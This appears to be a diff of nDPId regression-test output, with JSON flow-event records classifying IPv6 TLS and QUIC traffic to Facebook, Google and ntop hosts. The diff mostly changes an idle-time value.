{"version":"TLSv1.2","client_requested_server_name":"s-static.ak.facebook.com","server_names":"*.ak.fbcdn.net,s-static.ak.fbcdn.net,igsonar.com,*.igsonar.com,ak.facebook.com,*.ak.facebook.com,*.s-static.ak.facebook.com,connect.facebook.net,s-static.ak.facebook.com","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.ak.fbcdn.net","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"E7:62:76:74:8D:09:F7:E9:69:05:B8:1A:37:A1:30:2D:FF:3B:BC:0A"}} +00964{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":184,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269146905,"flow_last_seen":1448269146921,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2856,"flow_tot_l4_payload_len":3080,"flow_avg_l4_payload_len":513,"midstream":0,"thread_ts_msec":1448269146921,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53132,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s-static.ak.facebook.com","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} +01392{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":186,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1448269146905,"flow_last_seen":1448269146921,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2856,"flow_tot_l4_payload_len":3771,"flow_avg_l4_payload_len":471,"midstream":0,"thread_ts_msec":1448269146921,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53132,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s-static.ak.facebook.com","server_names":"*.ak.fbcdn.net,s-static.ak.fbcdn.net,igsonar.com,*.igsonar.com,ak.facebook.com,*.ak.facebook.com,*.s-static.ak.facebook.com,connect.facebook.net,s-static.ak.facebook.com","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.ak.fbcdn.net","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"E7:62:76:74:8D:09:F7:E9:69:05:B8:1A:37:A1:30:2D:FF:3B:BC:0A"}} +00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1448269146905,"flow_last_seen":1448269146970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2856,"flow_tot_l4_payload_len":4139,"flow_avg_l4_payload_len":344,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53132,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1448269146905,"flow_last_seen":1448269146966,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3547,"flow_tot_l4_payload_len":4139,"flow_avg_l4_payload_len":413,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53134,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00673{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1448269127395,"flow_last_seen":1448269127510,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":506,"flow_tot_l4_payload_len":1009,"flow_avg_l4_payload_len":72,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1017","src_port":41776,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00617{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1448269127395,"flow_last_seen":1448269127510,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":506,"flow_tot_l4_payload_len":1009,"flow_avg_l4_payload_len":72,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1017","src_port":41776,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00720{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":62,"flow_first_seen":1448269127400,"flow_last_seen":1448269138520,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":12133,"flow_avg_l4_payload_len":195,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1017","src_port":45931,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} -00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269139314,"flow_last_seen":1448269139321,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:1a1::eed","src_port":60124,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00607{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269139314,"flow_last_seen":1448269139321,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:1a1::eed","src_port":60124,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269127922,"flow_last_seen":1448269127940,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4006:803::2008","src_port":58660,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00610{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269127922,"flow_last_seen":1448269127940,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4006:803::2008","src_port":58660,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00840{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1448269138575,"flow_last_seen":1448269138746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":5364,"flow_avg_l4_payload_len":282,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37486,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} -00840{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1448269138575,"flow_last_seen":1448269138746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2668,"flow_tot_l4_payload_len":5364,"flow_avg_l4_payload_len":315,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37488,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} -00840{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1448269139219,"flow_last_seen":1448269139339,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":5364,"flow_avg_l4_payload_len":298,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37494,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} -00843{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1448269144450,"flow_last_seen":1448269144884,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":13365,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37506,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} -00666{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269123954,"flow_last_seen":1448269123971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4006:804::200e","src_port":40526,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00610{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269123954,"flow_last_seen":1448269123971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4006:804::200e","src_port":40526,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269143410,"flow_last_seen":1448269143539,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:2880:1010:3f20:face:b00c::25de","src_port":40308,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00622{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269143410,"flow_last_seen":1448269143539,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:2880:1010:3f20:face:b00c::25de","src_port":40308,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269139314,"flow_last_seen":1448269139321,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:1a1::eed","src_port":60124,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00607{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269139314,"flow_last_seen":1448269139321,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:1a1::eed","src_port":60124,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269127922,"flow_last_seen":1448269127940,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4006:803::2008","src_port":58660,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00610{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269127922,"flow_last_seen":1448269127940,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4006:803::2008","src_port":58660,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00840{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1448269138575,"flow_last_seen":1448269138746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":5364,"flow_avg_l4_payload_len":282,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37486,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} +00840{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1448269138575,"flow_last_seen":1448269138746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2668,"flow_tot_l4_payload_len":5364,"flow_avg_l4_payload_len":315,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37488,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} +00840{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1448269139219,"flow_last_seen":1448269139339,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":5364,"flow_avg_l4_payload_len":298,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37494,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} +00843{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1448269144450,"flow_last_seen":1448269144884,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":13365,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37506,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} +00666{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269123954,"flow_last_seen":1448269123971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4006:804::200e","src_port":40526,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00610{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269123954,"flow_last_seen":1448269123971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4006:804::200e","src_port":40526,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269143410,"flow_last_seen":1448269143539,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:2880:1010:3f20:face:b00c::25de","src_port":40308,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00622{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269143410,"flow_last_seen":1448269143539,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:2880:1010:3f20:face:b00c::25de","src_port":40308,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00629{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1448269127960,"flow_last_seen":1448269128028,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":198,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:400b:c02::5f","src_port":55145,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00614{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1448269127960,"flow_last_seen":1448269128028,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":198,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:400b:c02::5f","src_port":55145,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00665{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269144306,"flow_last_seen":1448269144348,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:400b:c02::9a","src_port":33062,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00609{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269144306,"flow_last_seen":1448269144348,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:400b:c02::9a","src_port":33062,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269145458,"flow_last_seen":1448269145478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1012","src_port":59690,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 